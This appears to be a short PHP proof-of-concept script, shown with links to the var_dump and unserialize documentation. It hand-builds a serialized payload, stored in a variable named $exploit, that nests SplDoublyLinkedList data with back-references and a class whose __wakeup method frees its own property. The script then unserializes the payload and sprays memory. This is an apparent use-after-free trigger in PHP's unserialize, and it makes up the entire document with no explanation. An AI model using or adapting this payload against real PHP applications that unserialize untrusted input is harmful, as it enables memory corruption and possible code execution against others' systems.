- var_dump: documentation ( source)
- unserialize: documentation ( source)
<?php
class a {
public $a;
function __wakeup() {
//foreach ($this->a as $aa) {
// echo($aa);
//}
$this->a=null;
}
}
$inner = 'i:1;:i:1711;:i:1712;:O:1:"a":1:{s:1:"a";R:2;}:i:13;';
$exploit = 'a:3:{i:0;C:19:"SplDoublyLinkedList":'.strlen($inner).':{'.$inner.'}i:1;O:1:"a":1:{s:1:"a";i:2;}i:2;r:5;}';
$data = unserialize($exploit);
for($i = 0; $i < 5; $i++) {
$v[$i] = 'hi'.$i;
}
var_dump($data);